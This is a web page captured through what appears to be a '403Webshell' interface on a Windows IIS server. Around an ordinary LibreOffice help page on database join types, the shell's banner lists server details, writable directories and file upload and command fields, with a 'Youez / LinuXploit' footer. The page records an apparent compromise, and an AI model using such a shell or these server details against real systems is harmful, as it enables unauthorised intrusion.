403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.145
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Program Files/LibreOffice/help/en-US/text/sdatabase/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Program Files/LibreOffice/help/en-US/text/sdatabase/02010101.html
<!DOCTYPE html>
<html lang="en-US" dir="ltr">
<head>
<base href="../../../">
<noscript><meta http-equiv="refresh" content="0; URL=../../../en-US/noscript.html"></noscript>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Join Properties</title>
<link rel="shortcut icon" href="media/navigation/favicon.ico">
<link type="text/css" href="normalize.css" rel="Stylesheet">
<link type="text/css" href="prism.css" rel="Stylesheet">
<link type="text/css" href="default.css" rel="Stylesheet">
<script type="text/javascript" src="polyfills.js"></script><script type="text/javascript" src="languages.js"></script><script type="text/javascript" src="en-US/langnames.js"></script><script type="text/javascript" src="flexsearch.debug.js"></script><script type="text/javascript" src="prism.js"></script><script type="text/javascript" src="help2.js" defer></script><script type="text/javascript" src="a11y-toggle.js" defer></script><script type="text/javascript" src="paginathing.js" defer></script><script type="text/javascript" src="en-US/bookmarks.js" defer></script><script type="text/javascript" src="en-US/contents.js" defer></script><script type="text/javascript" src="help.js" defer></script><meta name="viewport" content="width=device-width,initial-scale=1">
</head>
<body>
<header id="TopLeftHeader"><a class="symbol" href="en-US/text/shared/05/new_help.html"><div></div></a><a class="logo" href="en-US/text/shared/05/new_help.html"><p dir="auto">LibreOffice 24.2 Help</p></a><div class="dropdowns"><div class="modules">
<button type="button" data-a11y-toggle="modules-nav" id="modules" aria-haspopup="true" aria-expanded="false" aria-controls="modules-nav">Module</button><nav id="modules-nav" hidden=""></nav>
</div></div></header><aside class="leftside"><input id="accordion-1" name="accordion-menu" type="checkbox"><label for="accordion-1" dir="auto">Contents</label><div id="Contents" class="contents-treeview"></div></aside><div id="SearchFrame"><div id="Bookmarks">
<input id="search-bar" type="search" class="search" placeholder="Search in bookmarks for chosen module" dir="auto"><div class="nav-container" tabindex="0"><nav class="index" dir="auto"></nav></div>
</div></div>
<div id="DisplayArea" itemprop="softwareHelp" itemscope="true" itemtype="http://schema.org/SoftwareApplication">
<a name="bm_id3154015"></a><meta itemprop="keywords" content="links,relational databases (Base)">
      <meta itemprop="keywords" content="inner joins (Base)">
      <meta itemprop="keywords" content="joins in databases (Base)">
      <meta itemprop="keywords" content="left joins (Base)">
      <meta itemprop="keywords" content="right joins (Base)">
      <meta itemprop="keywords" content="full joins (Base)">

<h1 id="hd_id3154015" dir="auto">Join Properties</h1>
      <p id="par_id3151205" class="paragraph" dir="auto">If you double-click a connection between two linked fields in the query design, or if you choose <span class="emph">Insert - New Relation</span>, the <span class="emph">Join Properties</span> dialog appears. These properties will be used in all queries created in the future.</p>
      <a name="howtoget"></a><div class="howtoget">
<div><p class="howtogetheader" dir="auto"><a name="wie"></a>To access this command...</p></div>
<div class="howtogetbody">
         <div class="embedded"><p class="embedded" dir="auto">Open query design and choose <span class="emph">Insert - New Relation</span>, or double-click on a connection line between two tables.
</p></div>
      </div>
</div>
<br>
<a name="bm_id3150749"></a>
<a name="bm_id3150752"></a>
<h2 id="hd_id3155066" dir="auto">Tables involved</h2>
      <p id="par_id3153924" class="paragraph" dir="auto"><span class="avis">Specifies two different tables that you want to join.</span></p>
      <h2 id="hd_id3155766" dir="auto">Fields involved</h2>
      <p id="par_id3148994" class="paragraph" dir="auto"><span class="avis">Specifies two data fields that will be joined by a relation.</span></p>
      <h2 id="hd_id3159267" dir="auto">Options</h2>
<a name="bm_id3147321"></a>
<h3 id="hd_id3147340" dir="auto">Type</h3>
      <p id="par_id3152482" class="paragraph" dir="auto"><span class="avis">Specifies the join type of the selected join.</span> Some databases support only a subset of the various possible types.</p>
      <h3 id="hd_id3155334" dir="auto">Inner Join</h3>
      <p id="par_id3155936" class="paragraph" dir="auto"><span class="avis">In an inner join, the results table contains only those records for which the content of the linked fields is the same.</span> In LibreOffice SQL this type of link is created by a corresponding WHERE clause.</p>
      <h3 id="hd_id3156372" dir="auto">Left Join</h3>
      <p id="par_id3166450" class="paragraph" dir="auto"><span class="avis">In a left join, the results table contains all records of the queried fields from the left table and only those records of the queried fields from the right table for which the content of the linked fields is the same.</span> In LibreOffice SQL this type of link corresponds to the LEFT OUTER JOIN command.</p>
      <h3 id="hd_id3155607" dir="auto">Right Join</h3>
      <p id="par_id3150647" class="paragraph" dir="auto"><span class="avis">In a right join, the results table contains all records of the queried fields from the right table and only those records of the queried fields from the left table for which the content of the linked fields is the same.</span> In LibreOffice SQL this type of link corresponds to the RIGHT OUTER JOIN command.</p>
      <h3 id="hd_id3158215" dir="auto">Full Join</h3>
      <p id="par_id3163665" class="paragraph" dir="auto"><span class="avis">In a full join, the results table contains all records of the queried fields from the left and right tables.</span> In the SQL of LibreOffice this type of link corresponds to the FULL OUTER JOIN command.</p>
<h3 id="hd_id0305200912031976" dir="auto">Natural</h3>
      <p id="par_id0305200912031977" class="paragraph" dir="auto"><span class="avis">In a natural join, the keyword <span class="literal">NATURAL</span> is inserted into the SQL statement that defines the relation. The relation joins all columns that have the same column name in both tables. The resulting joined table contains only one column for each pair of equally named columns.</span></p>
   </div>
<div id="DonationFrame"></div>
<footer><div id="DEBUG" class="debug">
<h3 class="bug">Help content debug info:</h3>
<p dir="auto">This page is: <a href="https://opengrok.libreoffice.org/xref/help/source/text/sdatabase/02010101.xhp" target="_blank">/text/sdatabase/02010101.xhp</a></p>
<p dir="auto">Title is: Join Properties</p>
<p id="bm_module" dir="auto"></p>
<p id="bm_system" dir="auto"></p>
<p id="bm_HID" dir="auto"></p>
</div></footer>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit